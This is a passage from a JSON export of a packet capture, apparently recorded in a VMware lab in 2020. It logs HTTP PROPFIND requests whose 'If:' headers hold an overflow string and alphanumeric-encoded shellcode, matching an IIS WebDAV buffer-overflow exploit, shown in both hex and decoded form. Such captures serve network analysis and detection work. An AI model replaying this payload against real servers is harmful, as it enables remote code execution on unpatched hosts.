:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/GogJKfGLFcKuawfwjpUyzzwyrIbyTpJnLOhnPMoMeRmQexDwMJoGSnntFSkDuDOUvySoeyAsdxCSsopZAQehcCYELCKGlQlLLsXKNxeSXA<58><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/frrzCtRMIszzSbgxQcdAPuIaUNUBRbgvnrvlgvySwEGWOLSUYKnwCEIFPHbsCiCssDNZxscnzbNcDsPdZmTHYoXHjnxopZmRHmmTuXcIeL<65><4C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "176"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.480014000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.480014000",
|
||
"frame.time_delta": "0.000064000",
|
||
"frame.time_delta_displayed": "0.007840000",
|
||
"frame.time_relative": "16.730954000",
|
||
"frame.number": "183",
|
||
"frame.len": "339",
|
||
"frame.cap_len": "339",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "325",
|
||
"ip.id": "0x0000b659",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000079f2",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "34077",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "34077",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "39",
|
||
"tcp.len": "273",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1846308874",
|
||
"tcp.nxtseq": "1722",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "348371241",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00001a59",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:ff:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:ff:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868287",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000568000",
|
||
"tcp.analysis.bytes_in_flight": "1721",
|
||
"tcp.analysis.push_bytes_sent": "1721"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001205000",
|
||
"tcp.time_delta": "0.000064000"
|
||
},
|
||
"tcp.payload": "70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "182",
|
||
"tcp.segment": "183",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1721",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4e:47:45:75:6a:66:43:4e:77:44:74:47:4a:52:52:70:69:74:42:52:50:67:61:56:45:4b:42:68:54:4c:45:46:53:4d:68:66:65:77:78:73:6a:6b:4c:56:55:74:6f:51:79:57:53:4b:54:41:59:57:59:64:4b:67:54:49:75:67:4d:4b:4c:59:6b:77:78:4b:65:44:4a:44:62:43:73:6f:64:6c:4f:70:4b:64:59:4c:6d:75:70:4d:64:53:73:75:62:5a:6d:44:56:62:6c:69:72:e6:a9:a8:e5:81:b6:e5:9d:94:e7:9d:81:e5:85:94:e5:a5:87:e6:99:86:e4:89:84:e7:99:8c:e4:b5:83:e4:b9:b9:e6:95:96:e6:b9:a5:e6:b5:94:e7:a1:90:e7:81:84:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:a9:ab:e7:85:98:e5:89:a1:e7:89:ab:e4:95:91:e5:89:b2:e6:b5:a1:e4:95:ac:e6:a1:b3:e7:a9:b7:e7:a9:87:e6:bd:ac:e5:91:95:e4:a5:97:e4:b1:b7:e6:b1:ba:e7:91:b9:e5:a9:8c:e7:99:a7:e4:bd:b1:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:78:50:6a:6f:65:6d:53:68:42:74:4a:6e:58:72:4b:66:70:43:6d:44:59:50:67:4b:77:71:47:6f:62:7a:44:65:6c:68:70:62:62:4c:77:56:58:41:4c:73:59:65:52:46:58:7a:57:43:5a:75:49:53:4c:6f:52:43:55:73:67:4b:69:4b:50:7a:4c:69:77:4c:68:62:6e:6f:73:64:51:52:73:65:6f:41:4c:76:6b:6f:43:62:61:66:42:6d:6a:4c:42:49:67:74:45:43:64:47:63:e6:95:8b:e4:bd:a8:e4:bd:8b:e7:99:b0:e4:a9:90:e7:a9:87:e7:a5:b7:e6:9d:b4:e6:b9:b5:e4:91:ae:e5:a9:af:e6:85:94:e7:99:90:e5:91:8f:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:b1:b9:e5:a5:b6:e4:a1:a8:e5:89:b1:e1:8f:80:e6:a0:83:e4:b1:a8:e6:ad:8c:e7:89:95:e7:a9:b6:e7:95:a5:e4:a5:ac:e6:9d:b4:e7:a1:87:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/NGEujfCNwDtGJRRpitBRPgaVEKBhTLEFSMhfewxsjkLVUtoQyWSKTAYWYdKgTIugMKLYkwxKeDJDbCsodlOpKdYLmupMdSsubZmDVblir<69><72><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD